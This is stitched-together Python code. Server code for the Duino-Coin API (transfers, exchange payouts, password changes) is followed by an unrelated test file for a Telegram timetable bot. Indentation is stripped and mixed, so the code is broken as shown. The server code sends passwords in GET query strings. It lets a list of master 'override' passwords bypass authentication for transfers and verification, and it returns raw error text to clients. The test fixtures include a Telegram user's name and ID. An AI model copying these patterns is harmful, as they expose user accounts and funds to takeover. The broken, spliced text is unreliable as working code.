try:
try:
limit = int(request.args.get('limit', None))
except:
limit = 5
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
# dbg("/GET/users/"+str(username))
try:
balance = get_user_data(username)
except Exception as e:
return _error(f"This user doesn't exist: {e}")
try:
miners = get_miners(username)
except Exception as e:
miners = []
try:
transactions = get_transactions(username, limit)
except Exception as e:
transactions = []
result = {
'balance': balance,
'miners': miners,
'transactions': transactions
}
return _success(result)
@app.route("/users/")
@cache.cached(timeout=60)
def user_error():
return _error("Usage: /users/<username>")
@app.route("/changepass/<username>")
@limiter.limit("1 per 1 minute")
def api_changepass(username: str):
try:
old_password = request.args.get('password', None).encode("utf-8")
new_password = request.args.get('newpassword', None).encode("utf-8")
new_password_encrypted = hashpw(
new_password, gensalt(rounds=BCRYPT_ROUNDS))
if old_password == new_password:
return _error("New password must be different")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT *
FROM Users
WHERE username = ?""",
(username,))
old_password_database = datab.fetchone()[1].encode('utf-8')
except:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""SELECT *
FROM Users
WHERE username = ?""",
(username,))
old_password_database = datab.fetchone()[1]
if (checkpw(old_password, old_password_database)
or old_password in overrides):
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""UPDATE Users
set password = ?
where username = ?""",
(new_password_encrypted, username))
conn.commit()
print("Changed password of user " + username)
return _success("Your password has been changed")
else:
print("Passwords of user " + username + " don't match")
return _error("Your old password doesn't match!")
except Exception as e:
print("Error changing password: " + str(e))
return _error("Internal server error: " + str(e))
@app.route("/verify/<username>")
def api_verify(username: str):
try:
pwd = str(request.args.get('pass', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
admin = str(request.args.get('admin', "revox"))
except Exception as e:
return _error(f"Invalid data: {e}")
if not user_exists(username):
return _error("Invalid username :(")
if not pwd in overrides:
return _error("Invalid password!!!")
if is_verified(username) == "yes":
return _error("This user is already verified :P")
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set rig_verified = ?
where username = ?""",
("Yes", username))
conn.commit()
except Exception as e:
return _error(str(e))
try:
threading.Thread(target=protocol_verified_mail, args=[username, admin]).start()
except Exception as e:
return _error(str(e))
dbg(f"Verified {username} by {ip_addr} ({pwd})")
return _success("Success")
@app.route("/user_transactions/<username>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_username(username: str):
dbg("/GET/user_transactions/"+str(username))
try:
limit = int(request.args.get('limit', 5))
except Exception as e:
return _error(f"Invalid data: {e}")
try:
transactions = get_transactions(username, limit)
return _success(transactions)
except Exception as e:
return _error(f"Error: {e}")
@app.route("/id_transactions/<tx_id>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_id(tx_id: str):
# dbg("/GET/id_transactions/"+str(tx_id))
try:
return _success(api_tx_by_id(tx_id))
except Exception as e:
return _error("No transaction found")
def api_tx_by_id(tx_id: str):
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Transactions
WHERE id = ?""",
(tx_id, ))
row = datab.fetchone()
if not row:
raise Exception("No transaction found")
return row_to_transaction(row)
@app.route("/transactions/<hash>")
@cache.cached(timeout=SAVE_TIME)
def get_transaction_by_hash(hash: str):
# dbg("/GET/transactions/"+str(hash))
try:
return _success(api_tx_by_hash(hash))
except Exception as e:
return _error("No transaction found")
def api_tx_by_hash(hash: str):
with sqlconn(CONFIG_TRANSACTIONS, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute("""
SELECT *
FROM Transactions
WHERE hash = ?""",
(hash, ))
row = datab.fetchone()
if not row:
raise Exception("No transaction found")
return row_to_transaction(row)
@app.route("/balances/<username>")
@cache.cached(timeout=SAVE_TIME)
def api_get_user_balance(username: str):
# dbg("/GET/balances/"+str(username))
try:
return _success(get_user_data(username))
except Exception as e:
return _error("This user doesn't exist")
@app.route("/balances")
@cache.cached(timeout=SAVE_TIME*3)
def api_get_all_balances():
dbg("/GET/balances")
try:
return _success(get_all_balances())
except Exception as e:
return _error("Error fetching balances: " + str(e))
@app.route("/transactions")
@cache.cached(timeout=SAVE_TIME*3)
def api_get_all_transactions():
dbg("/GET/transactions")
try:
return _success(get_all_transactions())
except Exception as e:
return _error("Error fetching transactions: " + str(e))
@app.route("/miners")
@cache.cached(timeout=SAVE_TIME*3)
def api_get_all_miners():
dbg("/GET/miners")
try:
return _success(get_all_miners())
except Exception as e:
return _error("Error fetching miners: " + str(e))
@app.route("/statistics")
@cache.cached(timeout=SAVE_TIME*3)
def get_api_data():
# dbg("/GET/statistics")
data = {}
with open(API_JSON_URI, 'r') as f:
try:
data = load(f)
except:
pass
return jsonify(data)
@app.route("/ip")
def get_ip():
dbg("/GET/ip")
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
return _success(ip_addr)
@app.route("/statistics_miners")
@cache.cached(timeout=SAVE_TIME*3)
def get_api_data_miners():
dbg("/GET/statistics_miners")
all_miners = get_all_miners()
get_all_balances()
try:
to_return = {}
for user in all_miners:
try:
to_return[user] = {
"w": len(all_miners[user]),
"v": trusted[user]}
except:
continue
return _success(to_return)
except Exception as e:
return _error(str(e))
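# DUCO exchange endpoint: verifies the account and limits, fetches current rates,
# then pays out automatically for quick-exchange coins or e-mails a manual request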
@app.route("/exchange_request/")
@limiter.limit("2 per 1 day")
def exchange_request():
try:
username = str(request.args.get('username', None))
unhashed_pass = request.args.get('password', None).encode('utf-8')
email = str(request.args.get('email', None))
ex_type = str(request.args.get('type', None)).upper()
amount = int(request.args.get('amount', None))
coin = str(request.args.get('coin', None)).lower()
address = str(request.args.get('address', None))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
return _error(f"Invalid data: {e}")
dbg("EX:", username, email)
# return _error("Exchange requests on DUCO Exchange are currently disabled, use other exchange")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
if is_verified(username) != "yes":
return _error("Your account is not verified, see https://server.duinocoin.com/verify.html")
if username in banlist or username in jailedusr:
return _error("You are not elgible for the exchange (ToS violation)")
# Check email
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_mail = datab.fetchone()[2]
if not email == stored_mail:
return _error(
"This e-mail is not associated with your Duino-Coin account")
except Exception as e:
return _error("No user found: " + str(e))
# Check password
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_password = datab.fetchone()[1]
try:
if not checkpw(unhashed_pass, stored_password):
return _error("Invalid password")
except Exception as e:
if not checkpw(unhashed_pass, stored_password.encode('utf-8')):
return _error("Invalid password")
except Exception as e:
return _error("No user found: " + str(e))
altfeed = alt_check(ip_addr, username, True, False)
if altfeed[0]:
if not username in altfeed[1][:2]: # Filter first two accounts
return _error(f"You're using alt-account(s): {altfeed[1][2]}")
# Check the amount
if amount < 200:
return _error("Minimum exchangeable amount is 200 DUCO")
if amount > 10000:
return _error("Maximum exchangeable amount is 10000 DUCO")
if ex_type.upper() == "SELL":
balance = get_user_data(username)["balance"]
if amount > balance:
return _error("You don't have enough DUCO in your account ("
+ str(round(balance, 3))+")")
else:
exchange_balance = get_user_data(exchange_address["duco"])["balance"]
if amount > exchange_balance:
return _error("We don't have enough DUCO in our reserves ("
+ str(round(exchange_balance, 3))+"). "
+ "Try again later or with a smaller amount")
# Get current exchange rates
try:
de_api = requests.get("https://github.com/revoxhere/duco-exchange/"
+ "raw/master/api/v1/rates",
data=None).json()["result"]
except Exception as e:
return _error("Error getting exchange rates: " + str(e))
try:
exchanged_amount = round(
de_api[coin.lower()][ex_type.lower()]*amount,
len(str(de_api[coin.lower()][ex_type.lower()])))
except Exception:
return _error("That coin isn't listed")
# XRP has a high transaction fee so we need to check for that
if coin.lower() == "xrp" and ex_type.upper() == "SELL":
min_amount = round(0.3 / de_api["xrp"]["sell"])
if amount < min_amount:
return _error(f"Minimum sellable amount for XRP is {min_amount} DUCO")
# Generate TXID
# ~1/XXHASH_TX_PROB of transactions get an xxhash TXID, the rest use sha1
tx_rand = random.randint(0, XXHASH_TX_PROB+1)
if tx_rand != XXHASH_TX_PROB:
global_last_block_hash_cp = sha1(
bytes(str(username)+str(amount)+str(tx_rand),
encoding='ascii')).hexdigest()
else:
global_last_block_hash_cp = xxh64(
bytes(str(username)+str(amount)+str(tx_rand),
encoding='ascii'), seed=2811).hexdigest()
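# Pays out the exchanged coins on the target chain (BCH/XMG/TRX/LKE/NANO) and sends confirmation e-mails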
def _quickexchange(ex_type, username, email, amount, exchanged_amount, coin, address):
if coin.lower() == "bch":
tx_api = "https://blockchair.com/bitcoin-cash/transaction/"
try:
if len(str(address)) == 34:
address = str(convert.to_cash_address(address))
coin_txid = bch_key.send([(str(address),
float(exchanged_amount), 'bch')],
unspents=bch_key.get_unspents())
dbg("EX: Sent BCH", coin_txid)
except Exception as e:
print("EX: Error sending BCH", traceback.format_exc())
error_log(
"Exchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
elif coin.lower() == "xmg":
tx_api = "https://magi.duinocoin.com/?search="
try:
coin_txid = requests.get(
"https://magi.duinocoin.com/transaction"
+ f"?username=revox&recipient={address}"
+ f"&password={DUCO_PASS}&amount={exchanged_amount}"
+ f"&memo=DUCO Exchange payment").json()
if "result" in coin_txid:
coin_txid = coin_txid["result"].split(",")[2]
dbg("EX: Sent XMG", coin_txid)
else:
raise Exception(coin_txid["message"])
except Exception as e:
print("EX: Error sending XMG", traceback.format_exc())
error_log(
"\nExchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
elif coin.lower() == "trx":
tx_api = "https://tronscan.org/#/transaction/"
try:
coin_txid = trx_key.trx.send_transaction(str(address),
float(exchanged_amount-1))["txid"]
dbg("EX: Sent TRX", coin_txid)
except Exception as e:
print("EX: Error sending TRX", traceback.format_exc())
error_log(
"\nExchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
elif coin.lower() == "lke":
tx_api = "https://explorer.likecoin.pro/tx/"
try:
coin_txid = likecoin_transaction(str(address), int(exchanged_amount), "DUCO Exchange payment")
dbg("EX: Sent LKE", coin_txid)
except Exception as e:
print("EX: Error sending LKE", traceback.format_exc())
error_log(
"\nExchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
elif coin.lower() == "nano":
tx_api = "https://nanocrawler.cc/explorer/block/"
try:
coin_txid = nano_key.send(str(address), float(exchanged_amount))
dbg("EX: Sent NANO", coin_txid)
except Exception as e:
print("EX: Error sending NANO", traceback.format_exc())
error_log(
"\nExchange error: " +
f"{ex_type} from {username} ({email}) - {amount} DUCO ({exchanged_amount} {coin}) {address} - {e}")
# return _error("Error transferring coins, please try again later: "+str(e))
html = """\
<html>
<body>
<p style="font-size:18px">
Automatic exchange finished<br>
Type: <b>""" + str(ex_type) + """</b><br>
Username: <b>""" + str(username) + """</b><br>
Amount: <b>""" + str(amount) + """</b> DUCO<br>
Email: <b>""" + str(email) + """</b><br>
Address: <b>""" + str(address) + """</b><br>
Sent: <b>""" + str(exchanged_amount) + """</b> """ + coin.upper() + """<br>
TXID: <a href='""" + str(tx_api) + str(coin_txid) + """'>"""+str(coin_txid)+"""</a><br>
DUCO TXID: <a href="https://explorer.duinocoin.com?search=""" + str(global_last_block_hash_cp) + """">"""+str(global_last_block_hash_cp)+"""</a>
</p>
</body>
</html>"""
try:
message = MIMEMultipart("alternative")
message["Subject"] = ("✅ Auto DUCO - "
+ str(coin).upper()
+ " "
+ ex_type.upper()
+ " exchange finished")
message["From"] = DUCO_EMAIL
message["To"] = EXCHANGE_MAIL
part = MIMEText(html, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, EXCHANGE_MAIL, message.as_string())
except Exception as e:
return _error("Error sending an e-mail to the exchange system")
####
email_body = html_auto.replace(
"{user}", str(username)
).replace(
"{amount}", str(amount)
).replace(
"{tx_api}", str(tx_api)
).replace(
"{txid}", str(coin_txid)
).replace(
"{duco_tx}", str(global_last_block_hash_cp))
message = MIMEMultipart("alternative")
message["Subject"] = "✨ Your DUCO - "+str(coin).upper()+" exchange is done!"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
quickexchange = ["bch", "trx", "lke", "nano", "xmg"]
if ex_type.lower() == "sell" and coin.lower() in quickexchange:
try:
threading.Thread(
target=_quickexchange,
args=[ex_type, username, email, amount, exchanged_amount, coin, address]).start()
dbg("Launched exchange thread")
except Exception as e:
return _error(f"Error lanching transaction thread: {e}")
elif ex_type.lower() == "sell":
html = """\
<html>
<body>
<p style="font-size:18px">
All checks for this user passed, exchange data:<br>
Type: <b>""" + str(ex_type) + """</b><br>
Username: <b>""" + str(username) + """</b><br>
Amount: <b>""" + str(amount) + """</b> DUCO<br>
Email: <b>""" + str(email) + """</b><br>
Address: <b>""" + str(address) + """</b><br>
Send: <b>""" + str(exchanged_amount) + """</b> """ + coin.upper() + """<br>
</p>
</body>
</html>"""
try:
message = MIMEMultipart("alternative")
message["Subject"] = ("⚠️ Manual DUCO - "
+ str(coin).upper()
+ " "
+ ex_type.lower()
+ " request")
message["From"] = DUCO_EMAIL
message["To"] = EXCHANGE_MAIL
part = MIMEText(html, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, EXCHANGE_MAIL, message.as_string())
except Exception as e:
return _error("Error sending an e-mail to the exchange system")
###
message = MIMEMultipart("alternative")
message["Subject"] = "🍒 Your DUCO Exchange sell request has been received"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_exc.replace(
"{user}", str(username)
).replace(
"{ex_type}", str(ex_type.lower())
).replace(
"{amount}", str(amount)
).replace(
"{address}", str(address)
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
elif ex_type.lower() == "buy":
###
message = MIMEMultipart("alternative")
message["Subject"] = "🔥 Finish your DUCO Exchange buy request"
try:
message["From"] = DUCO_EMAIL
message["To"] = email
email_body = html_buy.replace(
"{user}", str(username)
).replace(
"{coin}", str(coin.upper())
).replace(
"{amount}", str(amount)
).replace(
"{exchanged_amount}", str(exchanged_amount)
).replace(
"{exchange_address}", str(exchange_address[coin.lower()])
)
part = MIMEText(email_body, "html")
message.attach(part)
context = ssl.create_default_context()
with smtplib.SMTP_SSL("smtp.gmail.com", 465, context=context) as smtp:
smtp.login(
DUCO_EMAIL, DUCO_PASS)
smtp.sendmail(
DUCO_EMAIL, email, message.as_string())
except Exception:
print(traceback.format_exc())
if ex_type.lower() == "sell":
try:
recipient = "coinexchange"
memo = ("DUCO Exchange transaction "
+ "(sell for "
+ str(coin.upper())
+ ")")
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("NO,Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, username))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
username,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
except Exception:
return _success("Error deducting balance")
return _success("Your exchange request has been successfully submited")
@app.route("/transaction/")
@limiter.limit("2 per 1 minute")
def api_transaction():
global last_transfer
global banlist
global rate_count
# return _error("Temporarily disabled")
try:
username = str(request.args.get('username', None))
unhashed_pass = str(request.args.get('password', None)).encode('utf-8')
recipient = str(request.args.get('recipient', None))
amount = float(request.args.get('amount', None))
memo = sub(r'[^A-Za-z0-9 .()-:/!#_+-]+', ' ', str(request.args.get('memo', None)))
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
except Exception as e:
print(e)
return _error(f"NO,Invalid data: {e}")
dbg(f"New TX request: {username}",
f"\n\t amount: {amount}",
f"\n\t recipient: {recipient}",
f"\n\t memo: {memo}")
ip_feed = check_ip(ip_addr)
if ip_feed[0]:
return _error(ip_feed[1])
#return _error("Temporarily disabled")
chain_accounts = ["bscDUCO", "celoDUCO", "maticDUCO"]
if recipient in chain_accounts:
acccheck = acc_check(memo, username)
if acccheck[0]:
jail.append(username)
return _error(f"NO,This address is associated with another account(s): {acccheck[1]}")
if len(str(memo)) > 256:
memo = str(memo[0:253]) + "..."
if not match(r"^[A-Za-z0-9_-]*$", username):
return _error("NO,Incorrect username")
if not match(r"^[A-Za-z0-9_-]*$", recipient):
return _error("NO,Incorrect recipient")
if is_verified(username) == "no":
return _error("NO,Verify your account first")
if username in jail:
return _error("NO,BONK - go to kolka jail")
if recipient in banlist or recipient in jailedusr:
return _error("NO,Can\'t send funds to that user")
if username in banlist:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
ip_addr_ban(ip_addr)
return _error("NO,User baned")
if memo == "-" or memo == "":
memo = "None"
if round(float(amount), DECIMALS) <= 0:
return _error("NO,Incorrect amount")
if not user_exists(username):
return _error("NO,User doesn\'t exist")
if not user_exists(recipient):
return _error("NO,Recipient doesn\'t exist")
if username in rate_count:
if rate_count[username] >= 3:
banlist.append(username)
if username in last_transfer:
if (now() - last_transfer[username]).total_seconds() <= 30:
ip_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
if not ip_addr in whitelist:
dbg("TX: rate limiting", username,
(now() - last_transfer[username]).total_seconds(), "s")
return _error(
"NO,Please wait some time before making a transaction")
try:
rate_count[username] += 1
except:
rate_count[username] = 1
if not unhashed_pass.decode() in overrides:
try:
with sqlconn(DATABASE, timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(str(username),))
stored_password = datab.fetchone()[1]
try:
if not checkpw(unhashed_pass, stored_password):
return _error("NO,Invalid password")
except:
if not checkpw(unhashed_pass, stored_password.encode('utf-8')):
return _error("NO,Invalid password")
except Exception as e:
print(e)
return _error("NO,No user found: " + str(e))
else:
if memo != "None":
memo = str(memo) + " OVERRIDE"
else:
memo = "OVERRIDE"
altfeed = alt_check(ip_addr, username, True, False)
if altfeed[0]:
if not username in altfeed[1][:2]: # Filter first two accounts
return _error(f"NO,You're using alt-account(s): {altfeed[1][2]}")
try:
        import random
        rand_num = random.randint(0, XXHASH_TX_PROB+1)
        if rand_num != XXHASH_TX_PROB:
            global_last_block_hash_cp = sha1(
                bytes(str(username)+str(amount)+str(rand_num),
                      encoding='ascii')).hexdigest()
        else:
            global_last_block_hash_cp = xxh64(
                bytes(str(username)+str(amount)+str(rand_num),
                      encoding='ascii'), seed=2811).hexdigest()
if str(recipient) == str(username):
return _error("NO,You\'re sending funds to yourself")
if (str(amount) == "" or float(amount) <= 0):
return _error("NO,Incorrect amount")
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(username,))
balance = float(datab.fetchone()[3])
if (float(balance) <= float(amount)):
return _error("NO,Incorrect amount")
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""SELECT *
FROM Users
WHERE username = ?""",
(recipient,))
recipientbal = float(datab.fetchone()[3])
except:
return _error("NO,Recipient doesn\'t exist")
if float(balance) >= float(amount):
balance -= float(amount)
recipientbal += float(amount)
while True:
try:
with sqlconn(DATABASE,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(balance, username))
datab.execute(
"""UPDATE Users
set balance = ?
where username = ?""",
(round(float(recipientbal), 20), recipient))
conn.commit()
break
except:
pass
formatteddatetime = now().strftime("%d/%m/%Y %H:%M:%S")
with sqlconn(CONFIG_TRANSACTIONS,
timeout=DB_TIMEOUT) as conn:
datab = conn.cursor()
datab.execute(
"""INSERT INTO Transactions
(timestamp, username, recipient, amount, hash, memo)
VALUES(?, ?, ?, ?, ?, ?)""",
(formatteddatetime,
username,
recipient,
amount,
global_last_block_hash_cp,
memo))
conn.commit()
dbg(f"Success: transferred {amount} DUCO from",
f"{username} to {recipient} ({memo})")
last_transfer[username] = now()
return _success("OK,Successfully transferred funds,"
+ str(global_last_block_hash_cp))
except Exception as e:
return _error("NO,Internal server error")
@app.route("/pool_sync/")
def api_sync_proxy():
s = socket()
loginInfos = {}
syncData = {"blocks": {}}
try:
loginInfos["host"] = str(request.args.get('host', None))
loginInfos["port"] = str(request.args.get('port', None))
loginInfos["version"] = str(request.args.get('version', None))
loginInfos["identifier"] = str(request.args.get('identifier', None))
loginInfos["name"] = request.args.get('name', None)
syncData["blocks"]["blockIncrease"] = str(request.args.get('blockIncrease', None))
syncData["blocks"]["bigBlocks"] = str(request.args.get('bigBlocks', None))
syncData["cpu"] = str(request.args.get('cpu', None))
syncData["ram"] = str(request.args.get('ram', None))
syncData["connections"] = str(request.args.get('connections', None))
except Exception as e:
return _error(f"Invalid data: {e}")
try:
s.settimeout(10)
port = random.choice([2810, 2809, 2808, 2807, 2806])
s.connect(("127.0.0.1", port))
recv_ver = s.recv(5).decode().rstrip("\n")
if not recv_ver:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
elif float(recv_ver) != 2.7:
dbg(f"Warning: {loginInfos['name']} server versions don't match: {2.7}, {recv_ver}")
return _error(f"Invalid ver: {recv_ver}")
s.sendall(f"PoolLogin,{json.dumps(loginInfos)}\n".encode("utf-8"))
login_state = s.recv(16).decode().rstrip("\n")
if not login_state:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
if login_state != "LoginOK":
dbg(f"Error: {loginInfos['name']} invalid login state: {login_state}")
return _error(login_state)
s.sendall(f"PoolSync,{json.dumps(syncData)}\n".encode("utf-8"))
sync_state = s.recv(16).decode().rstrip("\n")
if not sync_state:
dbg(f"Warning: {loginInfos['name']} connection interrupted")
return _error(f"Connection interrupted")
if sync_state != "SyncOK":
dbg(f"Error: {loginInfos['name']} invalid sync state: {sync_state}")
return _error(sync_state)
s.close()
# dbg(f"Success: {loginInfos['name']} synced")
return _success(sync_state)
except Exception as e:
if str(e) == "timed outZ":
dbg(f"Error: {loginInfos['name']} timed out")
else:
dbg(f"Error: {loginInfos['name']} {e}")
return _error("Sync error: " + str(e))
|
Tests.py
|
"""
Something resembling tests.
TODO: Needs to be reworked
"""
import threading
from DB.DataBasePG import DataBasePg
from HseUtils.HseTelegram import HseTelegram
from Settings import SettingsTelegram
from Telegram import TelegramApi
from Utils.logging import Logging
from Utils.statics import Statics
from Utils.utils import Utils
dict_res1 = {
'update_id': 477824114,
'message': {
'message_id': 2249, 'from': {
'id': 453256909, 'is_bot': False, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp',
'language_code': 'ru'
}, 'chat': {
'id': 453256909, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp', 'type': 'private'
}, 'date': 1603435155, 'text': 'Расписание'
}
}
dict_res2 = {
'update_id': 477824114,
'message': {
'message_id': 2249, 'from': {
'id': 453256909, 'is_bot': False, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp',
'language_code': 'ru'
}, 'chat': {
'id': 453256909, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp', 'type': 'private'
}, 'date': 1603435155, 'text': 'Настройки'
}
}
dict_res3 = {
'update_id': 477824114,
'message': {
'message_id': 2249, 'from': {
'id': 453256909, 'is_bot': False, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp',
'language_code': 'ru'
}, 'chat': {
'id': 453256909, 'first_name': 'Илья', 'last_name': 'Логинов', 'username': 'KeldKemp', 'type': 'private'
}, 'date': 1603435155, 'text': 'Корпуса'
}
}
def groups_msg(result):
call_back_id = None
try:
last_text = result[0]['message']['text']
last_chat_id = result[0]['message']['chat']['id']
message_id = result[0]['message']['message_id']
except:
try:
last_text = result[0]['callback_query']['data']
except:
return 0
last_chat_id = result[0]['callback_query']['message']['chat']['id']
call_back_id = result[0]['callback_query']['id']
message_id = result[0]['callback_query']['message']['message_id']
if db.is_user(tg_id=int(last_chat_id)):
if last_text.find('/timetables') != -1:
hseTelegram.timetables_now(last_chat_id=last_chat_id, message_id=message_id)
elif last_text.find('/corps') != -1:
hseTelegram.get_all_corps(last_chat_id=last_chat_id, type='group')
elif last_text.find('par_dates_list') != -1:
telegram.answer_callback(call_back_id)
hseTelegram.timetables_date(last_chat_id=last_chat_id, last_text=last_text)
else:
telegram.send_msg(last_chat_id,
f'Возникли проблемы, обратитесь к @keldkemp\nErrorCode: 2\nID: {last_chat_id}')
def private_msg(result):
call_back_id = None
try:
last_text = result[0]['message']['text']
last_chat_id = result[0]['message']['chat']['id']
message_id = result[0]['message']['message_id']
try:
username = result[0]['message']['chat']['username']
except:
if db.is_user(tg_id=int(last_chat_id)):
username = ''
else:
telegram.send_msg(last_chat_id, 'Возникли проблемы, обратитесь к @keldkemp\nErrorCode: 1')
return 0
except:
try:
last_text = result[0]['callback_query']['data']
except:
return 0
last_chat_id = result[0]['callback_query']['message']['chat']['id']
call_back_id = result[0]['callback_query']['id']
message_id = result[0]['callback_query']['message']['message_id']
try:
username = result[0]['callback_query']['message']['chat']['username']
except:
if db.is_user(tg_id=int(last_chat_id)):
username = ''
else:
telegram.send_msg(last_chat_id, 'Возникли проблемы, обратитесь к @keldkemp\nErrorCode: 1')
return 0
    # Start the worker threads
threading.Thread(target=razbor, args=(last_chat_id, call_back_id, username, last_text, message_id)).start()
def razbor(last_chat_id, call_back_id, username, last_text, message_id):
if db.is_user(tg_id=int(last_chat_id)) or db.is_user(username=username):
if last_text.find('Группа//') != -1:
telegram.answer_callback(call_back_id)
group = last_text.replace('Группа// ', '')
hseTelegram.update_group(last_chat_id=last_chat_id, group=group, username=username,
message_id=message_id)
elif db.is_user(tg_id=int(last_chat_id)) is False or last_text == 'ChangeGroups//':
telegram.answer_callback(call_back_id)
hseTelegram.change_group(last_chat_id=last_chat_id, username=username)
elif last_text == 'Расписание' or last_text.find('/timetables') != -1:
hseTelegram.timetables_now(last_chat_id=last_chat_id, message_id=message_id)
elif last_text.find('par_dates_list') != -1:
telegram.answer_callback(call_back_id)
hseTelegram.timetables_date(last_chat_id=last_chat_id, last_text=last_text)
elif last_text == 'Настройки':
hseTelegram.settings(last_chat_id=last_chat_id)
elif last_text == 'Корпуса' or last_text.find('/corps') != -1:
hseTelegram.get_all_corps(last_chat_id=last_chat_id)
elif last_text.lower().find('add') != -1 and db.is_admin(last_chat_id) == 1:
hseTelegram.add_users(last_chat_id=last_chat_id, last_text=last_text)
elif last_text.lower().find('sendallmsg') != -1 and db.is_admin(last_chat_id) == 1:
indx = last_text.find(' ')
msg = last_text[indx + 1:]
hseTelegram.send_all_users_msg(msg)
elif last_text.lower().find('statics') != -1 and db.is_admin(last_chat_id) == 1:
hseTelegram.get_stat(last_chat_id=last_chat_id)
elif last_text.lower().find('updatetimetable') != -1 and db.is_admin(last_chat_id) == 1:
hseTelegram.update_timetable(last_chat_id=last_chat_id)
else:
telegram.send_msg(last_chat_id, 'main', telegram.main_keyboard)
else:
telegram.send_msg(last_chat_id,
f'Возникли проблемы, обратитесь к @keldkemp\nErrorCode: 2\nID: {last_chat_id}')
list1 = []
i = 0
while True:
list1.append(dict_res1)
list1.append(dict_res2)
list1.append(dict_res3)
if i == 100:
break
i += 1
def get_list():
if len(list1) == 0:
return None
del list1[0]
return list1
threading.stack_size(128 * 1024)
db = DataBasePg()
log = Logging()
